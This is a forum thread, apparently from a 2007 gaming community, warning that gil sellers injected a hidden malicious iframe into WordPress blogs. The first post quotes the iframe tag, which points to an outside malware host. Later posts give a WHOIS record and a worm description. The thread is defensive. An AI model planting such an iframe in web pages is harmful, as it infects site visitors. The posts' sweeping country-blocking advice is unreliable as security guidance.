Gillsellers now going after wordpress blog

[Zigma]

I think this one is a lot bigger than ffxi.somepage etc since it was just one site. I was checking my website AVG popped up, along with IE with some remote access crap. Apparently now, gilsellers are targetting wordpress blogs. They sucessfully added an iframe to my linkshells blog. The code is the following.

<iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>

IE7 (Vista) asked me if I wanted this code to run, I, ofcourse said no, Firefox does not prompt anything but request/sends data to s81.cnzz.com. When you go there, you have chinese webmasters something something ;w;

http://i244.photobucket.com/albums/g...g?t=1198988409

A lot of people use wordpress for blogs/ffxi related stuff so I recommend you guys check and see if anything is funny.

[Pawky]

My question is does this shit still do anything If you've got Noscript running? I'm pretty illiterate about this kind of stuff

[Tajin]

Will depend on your NoScript configuration.

Edit: Just visited zigma site, and this comes up on NoScript. I have it configured to deny IFRAMES, which is the only extra stuff from the defaul configuration.

Fatal error: Call to undefined function wp() in /[Directory tree edited by me]/wp-blog-header.php on line 18

[Zigma]

Will depend on your NoScript configuration.

Edit: Just visited zigma site, and this comes up on NoScript. I have it configured to deny IFRAMES, which is the only extra stuff from the defaul configuration.

Fatal error: Call to undefined function wp() in /[Directory tree edited by me]/wp-blog-header.php on line 18

zigmals.com

i haven't finished moving my webpage over and prob won't in a while.

[cdgreg]

Will depend on your NoScript configuration.

Edit: Just visited zigma site, and this comes up on NoScript. I have it configured to deny IFRAMES, which is the only extra stuff from the defaul configuration.

Fatal error: Call to undefined function wp() in /[Directory tree edited by me]/wp-blog-header.php on line 18

Im looking in adblock plus preferences (Tools>Adblock Plus) and I do not see anything about allowing or denying Iframes. Where exactly do I go to specify that I do not want iframes allowed?

[vagus]

Are they just posting links in blogs? I'm confused.

[Pawky]

Will depend on your NoScript configuration.

Edit: Just visited zigma site, and this comes up on NoScript. I have it configured to deny IFRAMES, which is the only extra stuff from the defaul configuration.

Fatal error: Call to undefined function wp() in /[Directory tree edited by me]/wp-blog-header.php on line 18

Im looking in adblock plus preferences (Tools>Adblock Plus) and I do not see anything about allowing or denying Iframes. Where exactly do I go to specify that I do not want iframes allowed?

Noscript is a different Add-on, its not adblock

[Zigma]

Are they just posting links in blogs? I'm confused.

no, i'm not exactly sure but I believe they're using a vulnerability in wordpress to do sql injections. I have to look over my mysql logs to see where exactly.

[dendryte]

http://wordpress.org/support/topic/134928 - some discussion about the bug; funny that the developers closed the bug report citing not enough info. It should be the developers' responsibility to reproduce this.

Looks like the wp-stats-php.info guy deleted the file; it's zero bytes now, unless they're making it so that you can't get to it with wget/lynx/Firefox in Linux.

http://www.popov-roman.com/blog/prog...statistics-gt/ - I can't read the website's language nor any of the websites to which it links, but looks like some discussion on this iframe exploit.

[Doofus]

I've seen this on a lot of random sites, don't even know if they have anything to do with ffi, but yea i have them blocked via noscript v :nikkei:

[Bardlet]

Do you use the public Wordpress hosting, or is your site hosted yourself on a private server?

I have all my comments set to moderate, and I've gotten a bunch of gil-selling spam, which I promptly delete. I'm more concerned if this was done through comments or if they actually hacked and altered your coding on the actual page? My page is privately hosted, and if the latter is the case I need to contact my webhost admin (my ex-boyfriend -.-) to poke around and make things more secure for me.

[Koga]

Domain ID:D22443415-LRMS
Domain Name:WP-STATS-PHP.INFO
Created On:22-Nov-2007 13:45:05 UTC
Last Updated On:22-Nov-2007 13:45:07 UTC
Expiration Date:22-Nov-2008 13:45:05 UTC
Sponsoring Registrar:Gandi Sarl (R191-LRMS)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:O-901894-GANDI
Registrant Name:No
Registrant Organization:Ju Dehua
Registrant Street1:B1/4F., No. 211, Taigu Road, Waigaoqiao Free Trade Zone[/b]
Registrant City:Shanghai
Registrant Postal Code:10079
Registrant Country:CN CN = China's Country Code; Like USA = United States
Registrant Phone:+86.2158681248
Registrant Email:[email protected]
Admin ID:C11388674-LRMS
Admin Name:Ju Dehua
Admin Street1:B1/4F., No. 211, Taigu Road, Waigaoqiao Free Trade
Admin Street2:Zone
Admin City:Shanghai
Admin State/Province:
Admin Postal Code:10079
Admin Country:CN
Admin Phone:+86.2158681248
Admin Email:[email protected]


Billing ID:C1249598-LRMS
Billing Name:CONTACT NOT AUTHORITATIVE see http://www.gandi.net/whois
Billing Organization:GANDI sarl
Billing Street1:see also whois.gandi.net
Billing Cityaris
Billing Postal Code:F-75003
Billing Country:FR
Billing Email:[email protected]
Tech ID:C1249598-LRMS
Tech Name:CONTACT NOT AUTHORITATIVE see http://www.gandi.net/whois
Tech Organization:GANDI sarl
Tech Street1:see also whois.gandi.net
Tech Cityaris
Tech State/Province:
Tech Postal Code:F-75003
Tech Country:FR
Tech Email:[email protected]
Name Server:C.DNS.GANDI.NET
Name Server:B.DNS.GANDI.NET
Name Server:A.DNS.GANDI.NET


Have at it. best I can do from work and nothing from Taj yet.
EDIT>> Edited out blank fields.

[Titanss]

Yes, I visit some bahamut ls websites since it was my home when the game 1st came out and Ridexru's site always trys to run some crazy shit and my spyware starts blocking shit..I just figured it was a add on the mod wanted people to run but I never clicked it.

[Zigma]

Do you use the public Wordpress hosting, or is your site hosted yourself on a private server?

I have all my comments set to moderate, and I've gotten a bunch of gil-selling spam, which I promptly delete. I'm more concerned if this was done through comments or if they actually hacked and altered your coding on the actual page? My page is privately hosted, and if the latter is the case I need to contact my webhost admin (my ex-boyfriend -.-) to poke around and make things more secure for me.

its private.

[Aikar]

I usually report malware sites to their ISP/datacenter, unless its in china.

I dont even bother wasting my time on chinese sites

[ronin sparthos]

Meh, where most of the attacks are originating from

[Koga]

I usually report malware sites to their ISP/datacenter, unless its in china.

I dont even bother wasting my time on chinese sites

Yea it's why I posted it here.
Pointless to report a site from China.

[TheHeph]

If you run your own website and are concerned about security, one option you have is likely using a service like: http://www.trafficcleaner.com
...where you insert a bit of code onto your page and blocks the whole country of China.
You might end up blocking a legit user in china in the process but those are very minimal :3

You can also make your own custom list using a .htaccess file on your server and blocking off originating regions, like Shanghai.

[aceofspades]

i unescaped the code best i could and came up with this:

http://pastebin.com/mefb7452

notice mscass.exe in there?

http://www.trendmicro.com/vinfo/virusen ... YG&VSect=P

Description:

This worm may arrive via network shares.

It searches the network for certain shares, into which it attempts to drop copies of itself.

It takes advantage of software vulnerabilities to propagate across networks.

It opens ports.

It connects to IRC servers.

It joins IRC channels.

It executes commands from a remote malicious user.

It steals sensitive information, such as user names and passwords, related to certain games.

It terminates certain processes, if found running in memory.

[TheHeph]

hmmm fix one thing and they attack using something else, persistent bunch.